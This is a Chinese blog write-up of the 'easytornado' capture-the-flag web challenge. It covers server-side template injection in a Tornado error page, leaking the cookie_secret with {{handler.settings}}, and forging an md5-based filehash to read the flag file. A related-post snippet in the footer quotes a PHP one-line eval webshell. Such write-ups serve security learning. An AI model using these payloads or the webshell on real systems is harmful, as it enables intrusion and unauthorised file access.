攻防世界web高阶3分题(easytornado)

最新推荐文章于 2024-06-06 16:17:55 发布
最新推荐文章于 2024-06-06 16:17:55 发布
阅读量299 收藏 2
点赞数
分类专栏: 网安
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45791542/article/details/107735754
版权

读题

PS: tornado 查资料发现 Tornado (python的web框架)

  • 打开题目发现三个文件
    在这里插入图片描述

  • 第一个文件
    在这里插入图片描述说明flag应该是在fllllllllllllag文件中

  • 再进入第二个文件
    在这里插入图片描述

  • 进入第三个文件
    在这里插入图片描述
    发现提示md5(cookie_secret + md5(filename)),即先将filenamemd5加密,再将cookie_secretmd5加密后的filename进行md5加密,也就是说,目前我们需要知道的是filenamecookie_secret

测试后发现还有一个error界面,格式为/error?msg=Error,怀疑存在服务端模板注入攻击 (SSTI)

尝试输入/error?msg={{1}},确实是存在模板注入

尝试输入/error?msg={{7*7}},不存在运算

之后进行各种尝试与资料获取发现对于tornado框架存在附属文件handler.settings,于是尝试输入/error?msg={{handler.settings}}

发现 ‘cookie_secret’:

a0139494-52c6-435e-a40b-a770a2bd7eef

在这里插入图片描述

  • 构造payload
file?filename=/fllllllllllllag&filehash=**********************

PS:******************的内容是md5(cookie_secret+md5(/fllllllllllllag))

  • 简单说这个过程就是先/fllllllllllllag进行md5加密,加密后是3bf9f6cf685a6dd8defadabfb41a03a1,然后cookie_secret,也就是:
a0139494-52c6-435e-a40b-a770a2bd7eef

再与/fllllllllllllag经过md5加密后的形式,也就是3bf9f6cf685a6dd8defadabfb41a03a1,进行结合,再进行一次md5加密,也就是a0139494-52c6-435e-a40b-a770a2bd7eef3bf9f6cf685a6dd8defadabfb41a03a1进行md5加密,加密后是f5ea1957c3f9b84ff657e1bb22711d2b,也就得到了上面的***********

在这里插入图片描述
在这里插入图片描述

  • 得到flag
    在这里插入图片描述
Phoenix-Pl
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中国首届医院网络安全攻防演练Web部分真题
07-13
中国首届医院网络安全攻防演练Web部分真题,厦门站。一个WEB站点 源码。
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado
qq_43564182的博客
07-04 430
CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado 文章目录CTF-WEB学习-模板注入-[护网杯 2018]easy_tornado解题网页中出现cookie: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210704232702503.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0
攻防世界--Web进阶--easytornado---模板注入
z2560088的博客
10-11 247
目录 信息搜集 模板注入 生成filehash 信息搜集 发现flag的位置,于是我们试试能不能访问 报错了 查看/welcome.txt 由于render({options})可以猜测有模板注入漏洞。 /hints.txt提醒md5(cookie_secret+md5(filename)) 这个应该是file的hash算法了 filename应该是/fllllllllllllag cookie_secret不清楚 模板注入...
攻防世界 easytornado
最新发布
weixin_63640108的博客
06-06 292
tornado模板中,存在一些可以访问的快速对象,这里用到的是handler.settings,handler 指向RequestHandler,而RequestHandler.settings又指向self.application.settings,所以handler.settings就指向RequestHandler.application.settings了,这里面就是我们的一些环境变量。filehash通过md5(cookie_secret+md5(filename))获得。
buuctf部分题目wp
zhhhb1005的博客
06-19 1068
主要是记录平时做题遇见的没见过的题目
BUUCTF 6
qq_52431855的博客
01-19 199
知识点 一句话木马结构:<?php @eval($_POST['attack']) ?> render:python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。 SSIT:SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。详情可见该博客。 tornadoTornado龙卷风是一个开源的网络服务器框架,它是基于社交聚合网站FriendFeed的实时信息服务开发而来的。 6-1 做题思路
2018护网杯第一场 web easy tornado LTshop超详细解答
iamsongyu的博客
10-24 4854
easy tornado 这个tornado是一个python的模板,在web使用的时候给出了四个文件,可以访问,从提示中和url中可以看出,访问需要文件名+文件签名(长度为32位,计算方式为md5(cookie_secret + md5(filename)));  flag文件名题目已给出 /fllllllllllag         题目关键为如何获取cookie,在Bp抓包的情况下没有显...
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界easytornado-tornado模板注入
yuanxu8877的博客
11-28 371
攻防世界easytornado-tornado模板注入
XCTF-攻防世界CTF平台-Web类——15、easytornado(SSTI服务器模板注入、Tornado 框架render渲染函数、MD5加密)
Onlyone_1314的博客
12-11 2715
目录标题找到注入点查看tornado的官方文档得到cookie_secret的值计算md5值得到flag 打开题目地址: 题目描述使用了Tornado 框架,Tornado是Python的一种 Web 服务器软件框架。 有三个文件,分别查看: 提示flag所在的文件/fllllllllllllag,url中GET方式提交了2个参数:filename=/flag.txt&filehash=6d9ebcb83324409e048e0d8086173713 提示使用了render函数,由于rend
攻防世界 web进阶区 easytornado
m0_51395584的博客
06-17 419
攻防世界 web进阶区 easytornado Tornado 框架的漏洞利用
攻防世界easytornado 附带脚本
my_name_is_sy的博客
05-23 193
easytornado 打开后显示在flag中,我们可以看到提示 /flag.txt flag in /fllllllllllllag 然后,按照提示进入页面 那么,此处暂且搁置。打开“welcome.txt”页面。 得到提示 /welcome.txt render render 然后我们再打开提示页面“hints.txt” ...
漏洞复现-easy_tornado
qq_59350385的博客
07-04 275
windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有三个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
攻防世界 easytornado 详解
xmj818719的博客
03-28 848
Tornado框架 第一任务先找cookie_secret 没什么头绪,直接访问http://111.200.241.244:59809/file?filename=/fllllllllllllag&filehash=7bc08cbde1fe13f5898f51b5470dc21d 回想起前段时间做的py模板注入,用同样的方法试一下 还是无果 最后动用谷歌寻找框架漏洞 网上搜罗框架漏洞资料,资料大概意思是可用 handler.settings 访问配置文件 http...
【CTF】攻防世界——easy_RSA(Crypto)
热门推荐
x1a0he1的博客
05-04 1万+
eGl的CTF之路——easy_RSA(Crypto) 早就有动手写博客的想法了,素材也攒了不少,然而万事开头难。最近看到同学在这里发过的博客,终于决定动笔记录一下自己的成长之路了。 第一篇博客记录一道最基本的rsa私钥计算题: RSA的计算过程是: 任选两个大质数p和q,p!=q,计算N=pq 计算N的欧拉函数r(n)=(p-1)(q-1) 任选一个e满足 1<e<r(n) ,且...
CTF模板注入
weixin_43952190的博客
07-30 4190
模板注入赛题 1. [护网杯 2018]easy_tornado 进入后三个链接 /flag.txt # flag in /fllllllllllllag /welcome.txt #提示render(渲染) /hint.txt #提示md5(cookie_secret+md5(filename)) url上两个参数:filename&filehash 根据提示,要查看flag,已经知道了文件名,filehash也知道了构
攻防世界web新手题unserialize3
05-05
这道题是一个 PHP 反序列化的题目。 题目描述: 提示:这次不会那么简单了,打开源代码看看? 源代码: ``` error_reporting(0); highlight_file(__FILE__); class Show{ public $name; public $age; ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值